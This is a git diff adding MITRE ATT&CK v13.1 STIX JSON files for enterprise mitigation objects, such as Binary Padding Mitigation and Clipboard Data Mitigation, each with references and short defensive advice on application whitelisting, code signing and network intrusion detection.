a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--16a8ac85-a06f-460f-ad22-910167bd7332.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--16a8ac85-a06f-460f-ad22-910167bd7332.json new file mode 100644 index 0000000000000000000000000000000000000000..1834e0a05c349ed3c09cc34328051fa6359e52cb --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--16a8ac85-a06f-460f-ad22-910167bd7332.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--45f576fe-b754-4e7f-8716-eb3d6ac25347", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--16a8ac85-a06f-460f-ad22-910167bd7332", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1009", + "url": "https://attack.mitre.org/mitigations/T1009", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2021-08-23T20:25:18.699Z", + "name": "Binary Padding Mitigation", + "description": "Identify potentially malicious software that may be executed from a padded or otherwise obfuscated binary, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--16dd03c6-0dfb-4d77-89cd-9ff3ee6e533d.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--16dd03c6-0dfb-4d77-89cd-9ff3ee6e533d.json new file mode 100644 index 0000000000000000000000000000000000000000..7ca9f4ab49dc15307ad1b2e05d19428f6dd437da --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--16dd03c6-0dfb-4d77-89cd-9ff3ee6e533d.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--9d653a45-edfb-4f85-b697-2ec376decbd2", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--16dd03c6-0dfb-4d77-89cd-9ff3ee6e533d", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1123", + "url": "https://attack.mitre.org/mitigations/T1123", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2020-01-17T16:45:23.317Z", + "name": "Audio Capture Mitigation", + "description": "Mitigating this technique specifically may be difficult as it requires fine-grained API control. Efforts should be focused on preventing unwanted or unknown code from executing on a system.\n\nIdentify and block potentially malicious software that may be used to record audio by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--16f144e4-c780-4ed2-98b4-55d14e2dfa44.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--16f144e4-c780-4ed2-98b4-55d14e2dfa44.json new file mode 100644 index 0000000000000000000000000000000000000000..ac7cbc6091647f56d2af065011c269d8c475f5c2 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--16f144e4-c780-4ed2-98b4-55d14e2dfa44.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--1308f84b-35b8-4e16-b729-cba1e9032ed3", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--16f144e4-c780-4ed2-98b4-55d14e2dfa44", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://attack.mitre.org/mitigations/T1033", + "source_name": "mitre-attack", + "external_id": "T1033" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2021-08-23T20:25:21.484Z", + "name": "System Owner/User Discovery Mitigation", + "description": "Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about system users, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1881da33-fdf2-4eea-afd0-e04caf9c000f.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1881da33-fdf2-4eea-afd0-e04caf9c000f.json new file mode 100644 index 0000000000000000000000000000000000000000..8685df58f884821f0b4f0c3d4665fdbde7c5e0c5 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1881da33-fdf2-4eea-afd0-e04caf9c000f.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--caefcc43-fec8-4c8e-ae9a-909b1e2bfdea", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--1881da33-fdf2-4eea-afd0-e04caf9c000f", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1120", + "url": "https://attack.mitre.org/mitigations/T1120", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2020-01-17T16:45:23.899Z", + "name": "Peripheral Device Discovery Mitigation", + "description": "Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about peripheral devices, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--19edfa02-1a5f-47e4-ad82-3288f57f64cf.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--19edfa02-1a5f-47e4-ad82-3288f57f64cf.json new file mode 100644 index 0000000000000000000000000000000000000000..4ba7e06be40c6792eaf58680c690c9dc2aaf8f0b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--19edfa02-1a5f-47e4-ad82-3288f57f64cf.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--e99e78ed-842f-4876-bb62-88c0a7c4a4b6", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--19edfa02-1a5f-47e4-ad82-3288f57f64cf", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1115", + "url": "https://attack.mitre.org/mitigations/T1115", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2021-08-23T20:25:19.205Z", + "name": "Clipboard Data Mitigation", + "description": "Instead of blocking software based on clipboard capture behavior, identify potentially malicious software that may contain this functionality, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1a7f5bd3-f6ee-4bd7-b949-2f3632ad6158.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1a7f5bd3-f6ee-4bd7-b949-2f3632ad6158.json new file mode 100644 index 0000000000000000000000000000000000000000..9b967b0971e14df7ef68b99cafc0c703a0a72274 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1a7f5bd3-f6ee-4bd7-b949-2f3632ad6158.json @@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--c3d21c8d-0545-47bb-bd86-dc57b578890b", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--1a7f5bd3-f6ee-4bd7-b949-2f3632ad6158", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1144", + "external_id": "T1144" + } + ], + "modified": "2019-07-24T19:32:43.572Z", + "name": "Gatekeeper Bypass Mitigation", + "description": "Other tools should be used to supplement Gatekeeper's functionality. Additionally, system settings can prevent applications from running that haven't been downloaded through the Apple Store which can help mitigate some of these issues.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1c0711c8-2a73-48a1-893d-ff88bcd23824.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1c0711c8-2a73-48a1-893d-ff88bcd23824.json new file mode 100644 index 0000000000000000000000000000000000000000..d0d461dd6d4815ab87d477947418175c7ff490d8 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1c0711c8-2a73-48a1-893d-ff88bcd23824.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--2a2c56c4-9b08-4802-8c94-8f34f3fe36ee", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--1c0711c8-2a73-48a1-893d-ff88bcd23824", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1029", + "external_id": "T1029" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "modified": "2019-07-25T11:39:28.002Z", + "name": "Scheduled Transfer Mitigation", + "description": "Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary command and control infrastructure and malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool command and control signatures over time or construct protocols in such a way to avoid detection by common defensive tools. (Citation: University of Birmingham C2)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1c6bc7f3-d517-4971-aed4-8f939090846b.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1c6bc7f3-d517-4971-aed4-8f939090846b.json new file mode 100644 index 0000000000000000000000000000000000000000..ce7729eccea431d5e44d72935900a330e28675fe --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1c6bc7f3-d517-4971-aed4-8f939090846b.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--3e237046-0a51-4bba-b823-e0ae70fbac84", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--1c6bc7f3-d517-4971-aed4-8f939090846b", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1013", + "external_id": "T1013" + }, + { + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "source_name": "Beechey 2010" + } + ], + "modified": "2019-07-25T11:26:14.570Z", + "name": "Port Monitors Mitigation", + "description": "Identify and block potentially malicious software that may persist in this manner by using whitelisting (Citation: Beechey 2010) tools capable of monitoring DLL loads by processes running under SYSTEM permissions.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1dcaeb21-9348-42ea-950a-f842aaf1ae1f.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1dcaeb21-9348-42ea-950a-f842aaf1ae1f.json new file mode 100644 index 0000000000000000000000000000000000000000..e0c41431003f1eb4f88b6ac3abb9aa3913f4b9e8 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1dcaeb21-9348-42ea-950a-f842aaf1ae1f.json @@ -0,0 +1,31 @@ +{ + "type": "bundle", + "id": "bundle--f0faacb1-658d-465e-b853-7c9d86b58514", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--1dcaeb21-9348-42ea-950a-f842aaf1ae1f", + "type": "course-of-action", + "created": "2019-06-11T16:30:16.672Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "M1035", + "url": "https://attack.mitre.org/mitigations/M1035" + } + ], + "modified": "2020-06-09T20:51:00.027Z", + "name": "Limit Access to Resource Over Network", + "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1e4ef2c7-ee96-4484-9baa-3b5777561301.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1e4ef2c7-ee96-4484-9baa-3b5777561301.json new file mode 100644 index 0000000000000000000000000000000000000000..b26590cd4c8e6aa843bbcf4006709c6703513c1d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1e4ef2c7-ee96-4484-9baa-3b5777561301.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--ad71dc38-130f-486f-b355-d818d549a8e1", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--1e4ef2c7-ee96-4484-9baa-3b5777561301", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1155", + "external_id": "T1155" + }, + { + "source_name": "applescript signing", + "description": "Steven Sande. (2013, December 23). AppleScript and Automator gain new features in OS X Mavericks. Retrieved September 21, 2018.", + "url": "https://www.engadget.com/2013/10/23/applescript-and-automator-gain-new-features-in-os-x-mavericks/" + } + ], + "modified": "2019-07-24T14:31:55.409Z", + "name": "AppleScript Mitigation", + "description": "Require that all AppleScript be signed by a trusted developer ID before being executed - this will prevent random AppleScript code from executing (Citation: applescript signing). This subjects AppleScript code to the same scrutiny as other .app files passing through Gatekeeper.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1e614ba5-2fc5-4464-b512-2ceafb14d76d.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1e614ba5-2fc5-4464-b512-2ceafb14d76d.json new file mode 100644 index 0000000000000000000000000000000000000000..7419e92394828ce98c9c50750437c642530a0e4e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1e614ba5-2fc5-4464-b512-2ceafb14d76d.json @@ -0,0 +1,62 @@ +{ + "type": "bundle", + "id": "bundle--f2c3b025-ec98-4e8f-a6a4-014a4a652bd0", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--1e614ba5-2fc5-4464-b512-2ceafb14d76d", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1202", + "url": "https://attack.mitre.org/mitigations/T1202", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + }, + { + "source_name": "SpectorOPs SettingContent-ms Jun 2018", + "url": "https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39", + "description": "Nelson, M. (2018, June 11). The Tale of SettingContent-ms Files. Retrieved April 18, 2019." + } + ], + "modified": "2021-08-23T20:25:19.370Z", + "name": "Indirect Command Execution Mitigation", + "description": "Identify or block potentially malicious software that may contain abusive functionality by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP). These mechanisms can also be used to disable and/or limit user access to Windows utilities and file types/locations used to invoke malicious execution.(Citation: SpectorOPs SettingContent-ms Jun 2018)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1f34230d-b6ae-4dc7-8599-78c18820bd21.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1f34230d-b6ae-4dc7-8599-78c18820bd21.json new file mode 100644 index 0000000000000000000000000000000000000000..b27e7a08ff1232b714b098e07061084014416c01 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--1f34230d-b6ae-4dc7-8599-78c18820bd21.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--5f8d0e0b-4c0e-4da4-a5ed-b5f36cc5e030", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--1f34230d-b6ae-4dc7-8599-78c18820bd21", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1135", + "url": "https://attack.mitre.org/mitigations/T1135", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. 